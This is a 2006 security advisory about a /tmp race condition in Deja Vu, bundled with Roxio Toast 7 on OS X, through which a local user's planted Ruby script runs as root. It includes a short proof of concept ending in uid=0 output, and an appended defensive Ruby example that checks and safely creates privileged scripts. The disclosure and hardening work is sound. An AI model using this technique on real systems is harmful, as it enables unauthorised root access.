ROXIO_RACE_NETRAGARD-20060624.txt

Date: 13 Sep 2006. Reported by: Adriel T. Desautels. Type: packetstorm. Source: packetstormsecurity.com

Netragard advisory on Roxio Toast 7 Titaniu

`******************** Netragard, L.L.C Advisory* *******************  
09/11/2006   
  
Strategic Reconnaissance Team  
------------------------------------------------  
http://www.netragard.com -- "We make I.T. Safe."  
  
  
[About Netragard]  
----------------------------------------------------------------------  
Netragard is a unique I.T. Security company whose services are  
fortified by continual vulnerability research and development. This  
ongoing research, which is performed by our Strategic Reconnaissance  
Team, specifically focuses on Operating Systems and Applications  
commonly used by businesses internationally. We apply the knowledge  
gained by performing this research to our professional security  
services. This in turn enables us to produce high quality deliverables  
that are the product of talented security professionals and not those  
of automated scanners and tools. This advisory is the product of  
research done by the Strategic Reconnaissance Team.  
  
  
[ For more information please visit http://www.netragard.com ]  
  
  
[Advisory Information]  
----------------------------------------------------------------------  
Contact : Adriel T. Desautels  
Advisory ID : NETRAGARD-20060624  
Product Name : Roxio Toast  
Product Version : 7 Titanium  
Vendor Name : Sonic Solutions / Propaganda Productions  
Type of Vulnerability : Local Root Compromise  
Effort : Difficult, depends on timing.  
Operating System : OSX  
Other : Race Condition Exploitation in Deja Vu which  
is bundled into Roxio Toast. Deja Vu is the  
product of Propaganda Productions.  
  
Official Advisory URL:  
----------------------------------------------------------------------  
http://www.netragard.com/pdfs/research/ROXIO_RACE_NETRAGARD-20060624.txt  
  
  
[Product Description]  
----------------------------------------------------------------------  
"Toast 7 is the best way to save, share and enjoy a lifetime of digital  
music, movies and photos on CD and DVD. Burn large files across  
multiple discs; compress and copy DVD movies; add over 50 hours of  
music to an audio DVD with on-screen TV menus, shuffle play, and rich  
Dolby Digital sound; burn DivX files into DVDs. Do it all with the  
fastest and most reliable burning software for the Mac OS - Toast."  
  
  
  
--http://www.roxio.com--  
  
  
[Technical Summary]  
----------------------------------------------------------------------  
Deja Vu, which is bundled with Roxio Toast 7, creates ruby scripts in  
the /tmp directory. These scripts contain commands which are executed  
with escalated privileges. A race condition exists which makes it  
possible to execute arbitrary commands against the system or gain  
root level access.  
  
  
  
[Technical Details]  
----------------------------------------------------------------------  
This was tested using a configured version of Roxio Toast 7 Titanium.  
(reproduction depends on timing)  
  
  
  
######################################################################  
#  
# dejavu_manual.rb was created by user test  
#  
######################################################################  
netragard-test> ls -al /tmp/dejavu_manual.rb  
-rw-r--r-- 1 test wheel 32843 Jul 7 21:41 /tmp/dejavu_manual.rb  
  
  
######################################################################  
#  
# The contents of dejavu_manual.rb  
#  
######################################################################  
netragard-test>cat test.rb  
#!/usr/bin/ruby  
system '/usr/bin/id'  
  
  
######################################################################  
#  
# 1) Open the System Preferences  
# 2) Click on deja vu  
# 3) Perform a manual backup.  
# 4) Notice uid=0(root)  
#  
######################################################################  
netragard-test> /Applications/System\ Preferences.app/Contents/MacOS/  
System\ Preferences  
  
  
uid=0(root) gid=501(test) groups=501(test),  
81(appserveradm), 79(appserverusr), 80(admin)  
  
  
  
[Proof Of Concept]   
----------------------------------------------------------------------  
Demonstrated above.  
  
  
  
[Vendor Status]  
----------------------------------------------------------------------  
Propaganda Productions was notified by Sonic Solutions on behalf of  
Netragard, L.L.C. on August 10th 2006. As of today Netragard has not  
received any response from Propaganda Productions.  
  
  
[Disclaimer]  
---------------------http://www.netragard.com-------------------------  
Netragard, L.L.C. assumes no liability for the use of the information  
provided in this advisory. This advisory was released in an effort to  
help the I.T. community protect themselves against a potentially  
dangerous security hole. This advisory is not an attempt to solicit  
business.  
  
  
Regards,  
Netragard Strategic Reconnaissance Team  
advisories at netragard dot com  
http://www.netragard.com  
-------------------------  
"We make I.T. Secure"  
  
  
  
  
  
  
`
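
The following is an added example, not part of the Netragard advisory and not Deja Vu's code. It shows the pre-execution checks a privileged helper can apply to a generated script, and a hardened way to create that script outside a shared directory such as /tmp. The function names `unsafe_reasons` and `write_private_script` and the file name `job.rb` are assumptions made for illustration.

```ruby
require 'tmpdir'
require 'fileutils'

# Reasons a privileged process must refuse to run the script at `path`.
# An empty list means every check passed. `trusted_uid` is the only
# account allowed to own the script and its directory.
def unsafe_reasons(path, trusted_uid = Process.euid)
  reasons = []
  st = File.lstat(path)                       # lstat: do not follow symlinks
  reasons << 'is a symlink' if st.symlink?
  reasons << 'not a regular file' unless st.file? || st.symlink?
  reasons << "owned by uid #{st.uid}" unless st.uid == trusted_uid
  reasons << 'group/world writable' unless (st.mode & 0o022).zero?
  dir = File.stat(File.dirname(path))
  reasons << 'parent dir owned by another uid' unless dir.uid == trusted_uid
  # A sticky bit does not help: any user can still create the name first.
  reasons << 'parent dir group/world writable' unless (dir.mode & 0o022).zero?
  reasons
rescue Errno::ENOENT
  ['missing']
end

# Hardened creation: a 0700 directory with a random name, and O_EXCL so the
# open fails if anything (file or symlink) already exists at the path.
def write_private_script(body)
  dir = Dir.mktmpdir('helper-')               # created with mode 0700
  path = File.join(dir, 'job.rb')
  File.open(path, File::WRONLY | File::CREAT | File::EXCL, 0o600) { |f| f.write(body) }
  path
end

if __FILE__ == $PROGRAM_NAME
  # Constructed stand-in for the advisory's /tmp/dejavu_manual.rb layout.
  shared = Dir.mktmpdir('shared-')
  File.chmod(0o1777, shared)
  weak = File.join(shared, 'dejavu_manual.rb')
  File.write(weak, "puts 'backup'\n")
  safe = write_private_script("puts 'backup'\n")
  puts "weak: #{unsafe_reasons(weak).inspect}"
  puts "safe: #{unsafe_reasons(safe).inspect}"
  FileUtils.rm_rf([shared, File.dirname(safe)])
end
```

The parent-directory checks are what close the timing window: a file that passes its own checks inside a directory other users can write to can still be replaced between the check and the execution. A root-side caller would pass `0` as `trusted_uid`, which rejects the `test`-owned file shown in the advisory's `ls -al` output.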
